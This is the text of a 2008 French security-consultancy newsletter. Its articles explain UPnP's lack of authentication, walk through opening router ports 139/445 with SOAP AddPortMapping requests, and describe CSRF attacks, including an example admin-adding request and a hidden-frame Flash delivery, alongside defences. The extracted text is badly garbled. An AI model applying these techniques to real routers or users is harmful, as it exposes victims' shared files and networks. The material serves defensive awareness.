XMCO ActuSecu 20 UPNP

LACTUSCU 20
XMCO | PARTNERS
UPNP (PLUG N PLAY) UN PROTOCOLE DANGEREUX ?
SO MM AIR E
H acking UP nP : p r s e n t a t i o n d u p ro t o c o l e e t d e s e s f a i b l e s s es Les at t aque s UP nP /CSR F : le v e c te u r d a tta q u e F l a s h . . . La conf re n c e S S T I C 0 8 Lactuali t d u m o i s : l a fa ille S S L , le v ir u s M a c e t l a tta q u e D NS ... Les logi c ie ls du m ois : Flying Bit Password Keeper, Keepass et Axban
Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est !!!!!!!!!!!!!!!!!!!!!!!!!!!!!! strictement interdite.
LACTU SCU N20
Vo u s t e s c o n c e r n p a r l a s c u r i t i n f o r m a t i q u e d e v o t r e e n t r e p r i s e ?
Xmco Partners est un cabinet de conseil dont le mtier est l'audit en scurit informatique.
Tests d'intrusion Mise l'preuve de vos rseaux, systmes et applications web par nos experts en intrusion
OWASP, OSSTMM, CCWAPSS
Audit de scurit Audit technique et organisationnel de la scurit de votre Systme d'Information

Best Practices ISO 27001, PCI DSS, Sarbanes-Oxley
Veille en vulnrabilits Suivi personnalis des vulnrabilits et correctifs affectant votre Systme d'Information
Rponse intrusion Dtection et diagnostic d'intrusion, collecte des preuves, tude des logs, autopsie de malware
propos du cabinet Xmco Partners Fond en 2002 par des experts en scurit, dirig par ses fondateurs, nous n'intervenons que sous forme de projets forfaitaires avec engagement de rsultats. Les tests d'intrusion, les audits de scurit, la veille en vulnrabilit constituent nos axes majeurs de dveloppement pour notre cabinet. Paralllement, nous intervenons auprs de Directions Gnrales dans le cadre de missions d!accompagnement de RSSI, d!laboration de schma directeur ou encore de sminaires de sensibilisation auprs de plusieurs grands comptes franais.
Pour contacter le cabinet Xmco Partners et dcouvrir nos prestations : http://www.xmcopartners.com/
WWW.XMCOPARTNERS.COM
LEDITO
Breaking the wall..?
Aprs avoir assist une prsentation de Cdric Blancher (EADS/France/Innovation Works) lors de la SSTIC Rennes, j'ai enn pu nommer une ide qui me trottait dans la tte : la dprimtrisation. Comme l'explique habilement Cdric Blancher, la dprimtrisation est un concept, pouss par le Jericho Forum, plaidant pour le retrait des rewalls. Cdric Blancher alerte l'assistance sur le danger d'une telle vision. L'argument employ par le Jericho Forum a de quoi sduire : puisque les attaques arrivent dsormais par email, par les sites web ou au travers des VPNs nomades, quoi bon investir des millions dans des rewalls devenus inutiles ? Beaucoup d'entreprises se sentent draisonnablement protges par leur rewall. C'est un fait. Nous le vrions rgulirement lors de nos audits de scurit : A quoi sert un rewall si les ports 80, 135, 139 et 445 ne doivent pas tre bloqus ? Sachant que 99% des attaquants passeront forcment par ces ports, le rewall est-il vraiment utile ? De quelle menace nous protge un rewall ? J'ai plusieurs fois fait cette remarque des entreprises. La rponse obtenue est bluffante : "Oui, ces ports sont ouverts, mais le rewall les ltre tout de mme et nous protge un minimum contre les attaques, comme le spoong. Je vois que le discours de vendeurs de rewall est bien rod... Mais va-t-on connecter les systmes critiques bancaires directement sur Internet et partir en vacances ? Non. Pour cerner un peu la philosophie du Jericho Forum, peut-tre faut-il savoir que ses membres sont, entre autres, Boeing, Air France, Symantec, Deloitte...(Airbus n'en fait pas partie). Pour ces entreprises internationales, la
O2 R M U N
majorit des informations de valeur circulent sur les postes d'utilisateur nomades rpartis chez des clients, des prestataires, des htels, des salles de runion, etc. Certains de ces membres ont mis la philosophie en application en positionnant leurs ottes de nomades directement sur Internet. Et la scurit ? Le concept de dprimtrisation insiste sur le fait qu'il faut dpenser de l'argent pour protger les vritables donnes de valeur de l'entreprise plutt que de tenter de protger des lments peu importants. Le concept est intressant. l'heure des datacenters et du Cloud Computing, les rewalls de l'entreprise sont-ils encore garants de la scurit des donnes vitales ? Frdric Charpentier Consultant XMCO
Hacking with UPnP......................................4

Prsentation du protocole et des problmes de scurit associs
Rsume de la SSTIC...................................19
Prsentation des confrences
LActualit scurit du mois......................24 CSRF, Flash et UPnP..................................13

Analyse des attaques CSRF via lutilisation dune animation Flash Analyse des vulnrabilits dcouvertes le mois dernier
Outils Libres................................................39
Dcouvrez les outils utiles et pratiques.
LACTU SCU N20
LES DESSOUS DU PROTOCOLE UPNP (PLUGN PLAY)
Hacking with UPnP

UPnP a toujours t un protocole mconnu. Cr en 1999, ce dernier a peu peu t implment sur de nombreux quipements afin de faciliter linter-connexion sur un rseau IP. Cependant 9 ans aprs, la plupart des utilisateurs ne connaissent pas rellement lutilit de ce dernier ni les risques et les consquences de lutilisation de ce protocole en entreprise comme la maison. Cet article tentera de prsenter comment un pirate peut exploiter les fonctionnalits de ce protocole afin de mener diverses actions malicieuses... XMCO
| Partners
Le protocole UPnP, mconnu, mais efcace...

Dnition Le protocole UPnP (Plug and Play) a t cr en 1999. Le but de ce protocole est de permettre aux utilisateurs de connecter un quipement (Pare-feux, routeurs, imprimantes, priphriques multimdia, sans-l ou autres quipements lectroniques) sans avoir fait Polytechnique Microsoft dnit le protocole de la sorte The overall networking experience through automatic discovery and device interoperability. UPnP simplie donc l!interconnexion (partage, communication) entre les quipements d! un rseau local et supprime une tape qui a nerv plus d!un utilisateur": la conguration Une fois branch sur un rseau, un priphrique compatible UPnP communique avec les autres systmes et change des informations an de s!autocongurer. Tout ce processus de conguration est transparent aux yeux de l!utilisateur. Un quipement peut se connecter sur un rseau, obtenir une adresse IP, proposer et dcouvrir automatiquement les services disponibles sur ce rseau et tout cela automatiquement le rve"?
Les prols dnis par le forum UPnP Le forum UPnP [1] est un groupe fond en 1999 par plusieurs entreprises de l!industrie (dont Microsoft). Ce groupe est charg de dnir des normes pour permettre aux fabricants d!implmenter correctement le protocole UPnP au sein de leurs quipements. Plus de 340 vendeurs provenant de divers horizons (lectronique, informatique, rseau, quipements mobiles) ont rejoint ce forum et participent activement la dnition de nouvelles spcications.
Le
Ce forum aide donc dvelopper ce protocole pour simplier l!interconnexion des quipements au sein de rseaux personnels, mais galement d!entreprise. Le site Web http://www.UPnP.org/ regroupe ainsi tous les schmas et templates pour chaque type d!quipement compatible avec ce protocole. Plusieurs catgories ont t dnies et permettent de classier les services offerts par UPnP en fonction du
protocole UPnP simplifie linterconnexion entre les quipements dun rseau local sans ncessiter le moindre effort ct utilisateur...
LACTU SCU N20
type de l!quipement : passerelles Internet (Internet Gateway Device), Imprimantes (Printer Device & Print Basic Service), scanner, quipement de base (Basic Device), point d!accs (WLAN Access Point Device), quipement de scurit (DeviceSecurity), Camra de surveillance (Digital Security Camera), etc. Certains de ces prols deviennent des conteneurs pour d!autres.
Le fonctionnement du protocole UPnP

Les diffrents types dquipements Les spcications UPnP utilisent deux termes diffrents pour caractriser les quipements compatibles UPnP : -Le Device ou serveur : dsigne un quipement qui peut tre contrl par UPnP. Ce dernier possde donc un service en coute et des chiers de conguration propres aux fonctionnalits proposes. -Le Control Point ou client : quipement ou logiciel qui est en mesure de dcouvrir les services proposs par les quipements (Devices) d ! un rseau, de contrler ces quipements en question et de souscrire un service d!alertes qui prviendront des nouvelles modications de conguration d!un quipement. Les protocoles Le principe de fonctionnement du protocole UPnP est relativement simple. Ce protocole est bas sur des normes dnies par l!UPnP Forum [1]. Il s!appuie sur les standards Internet connus : IP, TCP/UDP, HTTP, SOAP (XML) . Aucun driver n ! est ncessaire l!implmentation d!un quipement UPnP.
Plusieurs catgories ont t dfinies par

le Forum UPnP et permettent de classifier les services offerts par le protocole UPnP...
Chacun de ces prols possde des standards (au format XML) qui doivent tre respects lors de l!implmentation du protocole UPnP sur un quipement donn.
Chaque produit UPnP doit respecter des spcications normalises. Cela n!empche pas aux fabricants d!ajouter une couche supplmentaire pour des services spciques en fonction de leurs besoins (certains routeurs peuvent, par exemple avoir une fonctionnalit d!activation du Wi via UPnP"!!!) Dans notre exemple, nous exploiterons les caractristiques des routeurs ADSL. Ces derniers sont regroups selon le prol propre aux passerelles Internet appeles Internet Gateway Device.
SSDP (Simple Service Discovery Protocol)" : ce protocole repose sur l!envoi de requte " HTTP over UDP" en multicast ou en unicast. Il permet de dcouvrir les services proposs par les quipements UPnP du rseau. HTTP/SOAP": ce protocole permet de modier les congurations via l!envoi de requtes http POST GENA (Generic Event Notication Architecture)": gre les notications de changement d!tat
Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est strictement interdite.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![5]
Template UPnP
Le protocole IP constitue la base pour les communications entre les priphriques UPnP. Pardessus ce premier protocole, nous retrouvons deux types de protocoles":
LACTU SCU N20
Les tapes Voici les diffrentes tapes qui caractrisent une communication UPnP. L!adressage Lorsqu!un quipement est connect sur un rseau, ce dernier va automatiquement recevoir une adresse IP dynamique si un serveur DHCP est prsent. Dans le cas contraire, l!quipement va s!attribuer une adresse IP en dterminant si cette adresse IP est dj utilise. Cette seconde mthode pourrait presque tre considre comme un acte de piratage"! La phase de dcouverte Une fois la connectivit IP tablie, l!quipement UPnP (de type Device/Serveur) doit alors alerter les autres lments du rseau de ses services. Des requtes SSDP NOTIFY sont alors mises en Multicast vers le port UDP/1900 de tous les quipements du rseau local. Chaque lment UPnP est ainsi en mesure de savoir quels quipements proposent quels services.
vers l!adresse Multicast 239.255.255.250 sur le port UDP/1900, c!est dire vers tous les quipements.
Requte M-SEARCH
Requte NOTIFY
Chaque quipement (device) Control Point rpondra via une requte 200 OK et l ! adresse (entte LOCATION) du chier de conguration XML consulter.
Chaque requte contient une entte LOCATION qui indiquera l!emplacement du chier XML contenant le catalogue des services proposs. De leur ct, les quipements client (ou Control Point) peuvent galement rechercher les quipements (devices) UPnP prsents sur le rseau en envoyant, intervalles rguliers, une requte SSDP M-SEARCH
Rponse d!une requte M-SEARCH
Description : Que ce soit au travers d!une requte NOTIFY ou en rponse une requte M-SEARCH, l!quipement renvoie toujours l!adresse de son chier de conguration XML indispensable pour le contrler. Ce chier contient une description de l!quipement (nom, numro de srie, adresse du fabricant) comme le montre la capture suivante.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![6]
LACTU SCU N20
Fichier de conguration UPnP d!une imprimante
Eventing : La dernire tape permet de faire la notication d!vmenents. Cette partie du protocole UPnP est la moins connue, mme si elle permet d!alerter les quipements du rseau appels Subscribers lorsqu!un changement de conguration survient. Ces alertes sont formates au format GENA. [http://en.wikipedia.org/ wiki/GENA] Par exemple, ds qu!un routeur va tre recongur, un message va tre envoy aux quipements qui se seront pralablement inscrits ce service pour leur signaler le changement effectu. Cas concrt Nombreux logiciels utiliss du quotidien utilisent sans mme que vous le sachiez le protocole UPnP an d!ouvrir automatiquement (et discrtement) certains ports sur votre routeur ADSL. MSN est l!exemple le plus connu. L!utilisation des services voix et tlphonie ncessite l!ouverture et le mapping des ports sur le routeur ou le pare-feu. Chose que MSN sait faire tout seul avec UPnP.
Le chier contient la liste de tous les services qu!il propose par l!intermdiaire de balises service.
Liste des services proposs par l!quipement UPnP
Le contrle : La dernire tape du protocole va consister lire ce chier XML et d!y identier les services disponibles, les paramtres que l!quipement UPnP accepte et l!URL (ControlUrl) laquelle envoyer les futures commandes. Muni de toutes ces informations, le client va pouvoir forger et envoyer une requte SOAP correctement formate contenant l!action qu!il dsire faire raliser au device UPnP.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![7]
D ! autres logiciels comme les clients BitTorrent Transmission sur Mac OS X ou uTorrent possdent mme une case cocher an de natter automatiquement les ports d!un routeur ADSL.
LACTU SCU N20
Les logiciels Peer-to-Peer ou encore certaines consoles de jeux utilisent galement ce procd Ct serveur, de nombreux quipements rseau implmentent par dfaut UPnP : imprimantes, parefeux, serveurs bitTorrent, camras de surveillance, serveurs multimdia (pour identier les chiers multimdia disponibles sur un rseau). ce stade, vous avez peut-tre dj sursaut Windows peut galement implmenter un client UPnP en ajoutant cette spcicit dans Ajouter un composant de Windows, puis Services de mise en rseau comme le montre la capture suivante :
Hacking UPnP
Les limites du protocole Aprs cette introduction, ce protocole apparat extrmement utile pour les non-informaticiens qui ne veulent pas s!aventurer dans la conguration manuelle d!un quipement. UPnP apporte donc une simplication notable de l!informatique d!un point de vue utilisateur, mais quel prix? Qu!en est-il de la scurit?
Les auteurs du protocole UPnP ont conu

un protocole, certes pratique, mais totalement non scuris
Une question vient tout de suite l!esprit" : pourquoi aucune notion de scurit n!a t aborde dans la prsentation du fonctionnement d!UPnP?? Et bien la rponse est simple, parce qu!il n!y a pas de scurit au sein de ce protocoletonnant non?
En effet, comment un quipement peut-il tre recongur distance sans le moindre mot de passe saisi par l!utilisateur"? La rponse est simpleen utilisant un protocole n!implmentant aucune authentication Ds lors, le systme Windows peut dcouvrir automatiquement les priphriques UPnP et alerte l!utilisateur par une pop-up ds qu!un tel quipement est dcouvert sur le rseau. Ce dernier est alors ajout dans favoris rseau. Les auteurs de UPnP ont conu un protocole, certes pratique, mais totalement non scuris. Une lecture des spcications et quelques tests manuels permettent en quelques minutes de recongurer n!importe quel quipement UPnP l!aide de simples requtes SSDP et HTTPah
Prsence d!une imprimante UPnP sur le rseau local
Un nouveau service apparat alors dans la liste des services de WIndows.
Service SSDP de Windows
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![8]
LACTU SCU N20
Les risques et les consquences Tous les quipements implmentant UPnP peuvent donc tre facilement contrls via de simples requtes HTTP/SOAP. Si certains quipements proposent de nombreux services, d!autres limitent considrablement le champ d!action du pirate. Le risque majeur concerne les particuliers. En effet, la majorit des routeurs ADSL du march activent ce protocole par dfaut. Un utilisateur lambda est donc expos une attaque UPnP via la simple visite d!une page web (ce que nous voquerons dans l!article suivant). Un routeur personnel peut donc tre recongur an d ! exposer les machines internes depuis l!extrieur (NAT de port).
De
nombreuses fonctionnalits sont offertes par les routeurs UPnP mais ces dernires divergent en fonction des fabricants
L!exemple le plus frappant serait de natter deux ports externes vers les ports 139 et 445 d!une machine interne an d!accder aux dossiers partags par la victime. Par ailleurs, d!autres fonctionnalits sont offertes par les routeurs, mais divergent en fonction des vendeurs. On peut entre autres citer les fonctionnalits suivantes : activation de l!interface d!administration sur Internet changement du serveur DNS pour mener des attaques de Pharming modication des identiants d!administration changement des paramtres PPP activation et modication de la conguration WIFI etc. Autre exemple intressant, la possibilit de crer un rseau de proxy. En effet, en mappant un port externe d!une victime vers un autre port externe d!une autre machine sur Internet, un pirate peut se crer un rseau rout qui lui permettra de camouer son adresse IP source lorsque ce dernier souhaite attaquer un serveur sur Internet. Bien entendu, ce problme d ! implmentation est rsolu sur les derniers rmwares des routeurs Internet, mais pas sur tous
La preuve par lexemple : natter un port via UPnP

Essayons prsent de dmontrer comment un pirate peut utiliser ce protocole partir d!un rseau local. Pour notre exemple, nous utiliserons un routeur ADSL du march. Notre premier souhait tait d!tablir un comparatif entre les principaux acteurs du march. Cependant, tous les routeurs ADSL ont t tests et s!avrent intrinsquement vulnrables. Cependant, la plupart de ces derniers offrent peu de services accessibles via ce protocole ce qui limite la surface d!attaque. Pourtant, tous implmentent une mme fonction phare : le Nat de port Pour notre exemple, nous tenterons donc de natter un port sur un routeur personnel ce qui parle le plus pour les informaticiens. Cette technique d!attaque pourrait exactement tre reproduite sur un autre quipement et avoir d!autres consquences.
La recherche dinformations Comme nous l!avons expliqu dans notre premire partie, la premire tape consiste rcuprer l!adresse pointant vers les chiers de conguration XML de notre quipement. Plusieurs mthodes peuvent tre utilises": ! cration et envoi d ! un paquet SSDP MSEARCH ! coute d!une requte NOTIFY envoye par le routeur Nous avons choisi d!utiliser deux outils, l!un nomm UPnPScan et un plugin NMAP permettant de crer ce paquet SSDP, de tlcharger puis de parser le chier de conguration an de renvoyer quelques informations que nous utiliserons pour mener bien notre attaque.
De plus, le pirate doit pouvoir cibler son attaque, c'est-dire faire pointer le dernier nud de son rseau vers le site qu!il doit attaquer. Le changement de cible de l!attaque ncessite donc de pirater nouveau sa dernire victime comme le montre le schma suivant.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![9]
LACTU SCU N20
Dans un premier temps, nous avons scann l!imprimante avec laquelle nous imprimons nos beaux rapports. La capture suivante montre les rsultats obtenus" : marque, modle de l!imprimante et l!adresse de son chier de conguration (en rouge).
Analyse du chier de conguration Visualisons avec notre navigateur ce chier an d!obtenir les caractristiques de l!quipement, les services proposs et les paramtres de notre routeur ADSL. Notre routeur propose 3 types de services diffrents. Chacune des catgories de services proposes possde son propre chier de conguration (dni par la balise SCPDURL) ainsi qu!une URL de contrle (URL o le client va envoyer sa requte dnie par la balise controlURL)": 1er service": Layer3Forwarding:1
Utilisation d!un plugin NMAP
Ritrons la mme opration avec l!outil UPnPScan sur un routeur ADSL sur lequel nous allons nous concentrer dans la suite de ce paragraphe.
Fichier de conguration Public_UPnP_Layer3F.xml
Ce premier service est donc dni au sein du chier XML Public_UPnP_Layer3F.xml. Ce dernier propose deux types d!actions diffrentes": S e t D e f a u l t C o n n e c t i o n S e r v i c e , GetDefaultConnectionService qui ne servent rien pour notre attaque.
Utilisation de l!outil UPnPScan
2me service": WANCommonInterfaceCong:1
Mmes rsultats, nous obtenons galement l!adresse du chier de conguration, savoir": http://192.168.1.1:8000/Public_UPnP_gatedesc.xml
Fichier de conguration Public_UPnP_WAND.xml
3 me service": WANIPConnection:1
Fichier de conguration Public_UPnP_WANIPConn.xml

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![10]
L e ch i e r Public _ U PnP_ WA N D .x m l p ro p o se galement diverses actions" qui permettent un client d!obtenir des informations sur le statut de la ligne ADSL (Dbit, informations diverses sur la ligne ADSL)
LACTU SCU N20
En tudiant de prs ce dernier, plusieurs balises Action retiennent notre attention dont notamment AddPortMappingBingo!
tudi. Il reste seulement utiliser les bonnes balises (SOAP-ENV:ENVELOPE) an de crer une enveloppe SOAP correcte.
Entte de la requte envoye au routeur
Actions disponibles
Paramtre de la requte POST (sans retour la ligne lors de l!envoi)
Aprs cette premire phase, nous avons alors toutes les clefs en main : le chier de conguration contenant le nom de l!action et des paramtres ncessaires pour natter les ports et l!adresse vers laquelle envoyer la requte Lenvoi dune requte malicieuse Passons arbitrairement prsent la phase principale de notre attaque : l!envoi de la commande qui va modier arbitrairement la conguration de notre routeur. Cette phase repose uniquement sur l!envoi d!une requte SOAP, c!est dire d!une requte HTTP POST possdant en paramtre un chier XML. En lisant les spcications UPnP, le pirate va pouvoir apprendre le format spcique de cette requte savoir :
L!envoi manuel peut bien entendu tre automatis avec un script comme le montre la capture suivante :
! ! ! !
le verbe POST suivi de l!URL vers laquelle envoyer la requte le champs Host constitu de l!adresse IP et du service UPnP le paramtre SOAPACTION qui va prciser quelle action raliser sur l!quipement cibl le champs Content-Type qui spcit l!utilisation du format XML
Automatisation de l!attaque
Le serveur rpond alors par un 200 OK si la requte est accepte. Le pirate a donc russi natter un port externe vers une adresse IP interne. Dans notre cas, le pirate peut ensuite accder depuis Internet au partage de chier de sa victime(nat des ports 139 et 445).
Paramtre de la requte POST : Les paramtres envoys dans le corps de la requte ont t identis au sein du chier XML que nous avons
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![11]
Entte :
LACTU SCU N20
Ct rseau local personnel, ce protocole simplie la vie, mais doit tre galement dsactiv, car les internautes sont malheureusement beaucoup plus vulnrables comme nous le montrerons dans l!article suivant.
Conclusion
UPnP est donc un protocole dangereux. L!absence de mcanisme d!authentication donne aux pirates des possibilits tendues qui dpendent notamment des implmentations propres chaque fabricant. Les routeurs ADSL sont au centre du problme, car la fonction de port mapping est indispensable pour les applications d!aujourd!huid!autant plus que la plupart des internautes utilisent encore des navigateurs vulnrables aux attaques CSRF comme nous le prsentons dans le prochain article.
Webographie
[1] Forum UPnP : http://www.UPnP.org/ [2] Blog de GNUCITIZEN http://www.gnucitizen.org/blog/hacking-with-UPnPuniversal-plug-and-play/ http://www.gnucitizen.org/blog/ash-UPnP-attack-faq/ http://www.gnucitizen.org/blog/UPnP-the-sagacontinues/ http://www.gnucitizen.org/blog/hacking-the-interwebs/
Les consquences Certains chercheront peut-tre le rel intrt de pirater le routeur de son rseau local (et par consquent son propre routeur). Mais qu!en serait-il si on pouvait recongurer le routeur de n!importe qui depuis Internet et d!accder aux partages de ce dernier"?? Rponse dans l!article suivant De mme, qu!en est-il des utilisateurs qui laissent les accs Wi ouverts" de leur routeur ? Par exemple, un pirate pourrait modier l!adresse IP du serveur DNS an de raliser des attaques de Pharming De plus, que pourrait-il se passer si des virus utilisaient galement UPnP"? En ce qui concerne les entreprises, il est certain qu!il va tre difcile de recongurer un Checkpoint ou un Pix via UPnP!! En revanche, un petit scan UDP sur le port 1900 de votre rseau peut s!avrer riche d!enseignements Vous n ! imaginez pas le nombre d ! quipements implmentant UPnP que nous avons rencontrs au cours de nos audits. Les solutions En entreprise, il est certain que le protocole UPnP a vraiment peu d!intrt. La rgle de base est donc de vrier que chaque nouvel quipement connect sur un rseau n!active pas par dfaut ce protocole et donc de le dsactiver chaque fois que c!est possible (par exemple les imprimantes).
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![12]
LACTU SCU N20
Les attaques CSRF et UPnP

Les attaques CSRF sont incontestablement un des nouveaux vecteurs dattaque web.
CSRF, FLASH ET... UPNP
Diffrentes mthodes sont utilises par les pirates afin denvoyer linsu de la victime des requtes HTTP. Nous dfinirons nouveau ce type dattaque (voir ActuScu fvrier 2007) en nous concentrant cette fois-ci, sur les animations Flash, redoutables armes et particulirement efficaces dans lexploitation des faiblesses du protocole UPnP...
XMCO
| Partners
Les attaques CSRF

Les attaques de Cross Site Request Forgeries (CSRF), sont des attaques lances partir de pages web. Peu mdiatises, ces attaques peuvent avoir des effets dvastateurs. " En effet, la visualisation d!une page Web malicieuse peut forcer le navigateur d!un utilisateur authenti sur une application Web, effectuer des actions son insu. Celles-ci utilisent ses droits (cookies) et permettent notamment de modier la conguration de son routeur ADSL, d!envoyer des emails, d!ajouter des utilisateurs sur une application
. Les balises HTML pour les requte GET L!attaque la plus frquente consiste placer une requte GET malicieuse dans l!attribut src d!une balise HTML. Plusieurs balises HTML telles que <img> <script> <iframe> peuvent tre utilises pour effectuer ce type d!attaque.
avoir des effets dvastateurs ...

Plusieurs mthodes d!attaque ont vu peu peu le jour, mais les dveloppeurs des navigateurs internet ont progressivement restreint les possibilits des attaquants, en plaant des limitations au l des versions. " Un article ddi aux attaques CSRF a d!ailleurs t crit dans l!Actu-Secu n11 [2]
Ainsi, le navigateur tente de rcuprer l!image en effectuant une requte vers la cible spcie. Jusqu!ici rien de malicieux (requte GET classique). Cependant, en plaant une cible telle que :
Le navigateur envoie une requte HTTP sur le site www.site-vulnerable.com,demandant d ! ajouter un

Peu mdiatises, les attaques CSRF peuvent
LACTU SCU N20
administrateur ayant pour login xmco et pour mot de passe xmco. Et cela, automatiquement, sans que le visiteur de la page malicieuse ne s!en rende compte.
Utilisation de code JavaScript pour les requtes GET et POST Les balises HTML permettent uniquement l!envoi de requtes GET. Pour envoyer des requtes en POST, l!utilisation d!un formulaire coupl un code javascript est ncessaire. Le formulaire ci-dessous permet d!envoyer automatiquement les paramtres login=xmco et pass=xmco en requte POST l!adresse http:// www.site-vulnerable.com/ajout-admin.php
En visitant cette page, le navigateur de la victime excute le code Javascript formevil.submit(); qui a pour effet de soumettre automatiquement le formulaire an d!envoyer les donnes.
!"" L!utilisateur visite un site malicieux. 2 Le site contient une balise image judicieusement conue. 3 Le navigateur de l!utilisateur tente de charger l!image en envoyant une requte HTTP. Cette requte permet d!ajouter le compte xmco/xmco 4 Le pirate peut se connecter sur le site avec le compte cr l!insu de l!utilisateur.
Ces attaques sont videments spciques, puisque le pirate doit connatre auparavant les paramtres envoyer.
D ! autre part, l ! utilisation de l ! objet Javascript XMLHttpRequest, trs utilis pour les applications Ajax, permet galement d!envoyer des requtes GET et POST.
Cependant, les navigateurs protgent les utilisateurs, en empchant cet objet d!effectuer des requtes sur un autre domaine que celui visit" : " Cross Domain Protected" . Il est alors impossible pour un attaquant d!effectuer une attaque CSRF si le site n!est pas galement vulnrable une attaque de type XSS (an d ! inclure le code javascript via cette seconde vulnrabilit).
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![14]
LACTU SCU N20
Les fonctionnalits externes Certaines fonctionnalits externes sont omniprsentes sur les navigateurs internet. En effet, de nombreux utilisateurs installent des logiciels s!implmentant directement dans les navigateurs (lecteur ash, lecteur vido ). C!est le cas du Flash Player dit par Adobe. Une tude rvle que prs de 99% des utilisateurs possdent le Flash Player d!install sur leur machine. Sujet de nombreuses attaques ces derniers temps, ce logiciel souffrait d ! une vulnrabilit permettant d!envoyer des requtes, sur des domaines externes. C!est d!ailleurs pour cette raison que nous avons commenc nos recherches dbut avril. Cependant, cette vulnrabilit, corrige uniquement dans la dernire version (9.0.124), reste largement exploitable comme nous vous le montrerons dans la suite de cet article. En effet, peu de personnes disposent de la toute dernire version du Flash Player d!Adobe. Vous pouvez d!ailleurs connatre la version de Flash Player utilise en visitant l!adresse suivante : http://www.macromedia.com/software/ash/about/
Les solutions contre ce type dattaque An de se prmunir de ce type d ! attaque, les applications utilisent principalement un token, chane alatoire gnre par le serveur, valable pour une seule action. Ce token, associ la session de l!utilisateur, est insr dans chaque formulaire. Un attaquant ne peut donc plus prvoir les donnes envoyer puisque le token ne peut pas, priori, tre prdit.
Exemple d!une requte comportant un token : w w w. s i t e - v u l n e r a b l e . c o m / a j o u t - a d m i n . p h p ? login=xmco&pass=xmco&token=q7645dfgd78erer Si le serveur rceptionne une requte comportant un token diffrent de celui gnr, l!action ne sera pas excute.
IE 8 ....
IE 8 et lobjet XDomainRequest
Statistiques des plugins utiliss avec Internet Explorer Peu dinformations sont disponibles actuellement, mais il semblerait que Microsoft ait choisi dimplmenter un nouvel objet au sein de Internet Explorer 8. Ce dernier nomm XDomainRequest permettrait deffectuer des requtes sur un autre que celui visit....Affaire suivre...
Cependant, Jeremiah Grossman [2] a men une tude sur les 500 sites web (ALEXA) les plus visits. Parmi ces derniers : 45% implmentent dj un chier crossdomain.xml. 7% implment aucune restriction ce qui signie que toutes les animations Flash hberges sur des sites tiers peuvent envoyer des requtes sur ces derniers.
strictement interdite.
Lien Microsoft : http://msdn.microsoft.com/en-us/library/ cc288060(VS.85).aspx
Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![15]
Dornavant, lorsqu!une animation Flash envoie des requtes sur un autre domaine que celui visit, le lecteur Flash tlcharge le chier Crossdomain.xml. Ce dernier contient alors la liste des domaines autoriss se connecter sur ce dernier.
LACTU SCU N20
Le CSRF combin aux faiblesses du protocole UPnP

Comme nous l!avons vu prcdemment, le protocole UPnP n!utilise aucun moyen d!authentication. Une attaque CSRF est-elle envisageable dans le cadre du protocole UPnP" ? C!est ce que nous allons essayer de vous prouver... " Prambule Aprs avoir vu les diffrentes possibilits offertes aux pirates pour mener des attaques CSRF, nous allons prsent tenter de mener une attaque CSRF sur un routeur ADSL en exploitant les faiblesses du protocole UPnP. Il faut savoir que le service UPnP est activ par dfaut sur de nombreux routeurs ADSL du march. Le but de notre attaque consiste recongurer le routeur de notre victime en l!incitant simplement visualiser une page web malicieuse. L!attaque via une simple balise HTML n!est pas envisageable, pour la simple raison que le protocole UPnP n!est pas bas sur le traitement de requte HTTP classique. Une requte SOAP est ncessaire la construction de paramtre spciques en POST (chier XML). L ! utilisation de code JavaScript avec l ! objet XMLHttpRequest permet de spcier les paramtres envoys, il est alors possible de construire une requte SOAP. Cependant pour des raisons de scurit les navigateurs empchent cet objet d!effectuer des requtes sur un autre domaine que celui visit. Il est alors impossible d!envoyer une requte sur une adresse IP autre que celle du serveur hbergeant la page contenant le code JavaScript. Nous nous sommes alors intresss la technologie Flash, largement rpandue au sein les navigateurs Internet. En effet, le lecteur ash permet lui aussi de gnrer des requtes avec des enttes HTTP forges sans restriction.
Lattaque Comme nous l!avons vu dans l!article prcdent, les possibilits offertes par les quipements UPnP sont nombreuses" : activation de la connexion WiFi, modication d ! entres DNS Cependant, ces fonctionnalits ne sont pas toujours implmentes. Ces dernires dpendent principalement des choix des constructeurs. Notre attaque se limitera natter les ports 139 et 445 an d!accder distance aux dossiers partags. Le NAT (Network Address Translation) permet de faire la correspondance entre les adresses internes (d!un rseau local) et l!adresse iP publique. En effectuant cette correspondance, il sera alors possible d ! accder aux dossiers partags d ! un ordinateur situ sur un rseau local, en se connectant sur l!adresse IP publique de la socit ou du particulier. Cette fonctionnalit est disponible sur tous les routeurs ADSL du march, ce qui permet de gnraliser l!attaque. Pour les besoins de notre tude, nous allons dvelopper une preuve de concept au langage FLEX (animation Flash) qui permettra d!envoyer une requte SOAP sur l!adresse IP du routeur.
1- L!utilisateur visualise un site malicieux 2- Le site Internet distribue une animation ash effectuant une requte sur le routeur ADSL permettant le nattage de ports 3- Le pirate peut accder aux chiers partags de l!utilisateur travers Internet. "
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![16]
LACTU SCU N20
L!attaque CSRF doit tre furtive, c'est--dire que la victime ne doit pas s!apercevoir qu!elle a t pige. An de rendre l!attaque transparente aux yeux de notre victime, nous allons utiliser des frames. Les frames permettent d!afcher plusieurs pages HTML dans diffrentes zones. Notre page web malicieuse comportera donc 3 frames, dont deux qui ne seront pas visibles (via le paramtre 0%).
Cette animation permet d!envoyer une requte SOAP sur l!adresse IP du routeur an de natter le port 139. Voici la requte non encode:
Code source de la page HTML malicieuse
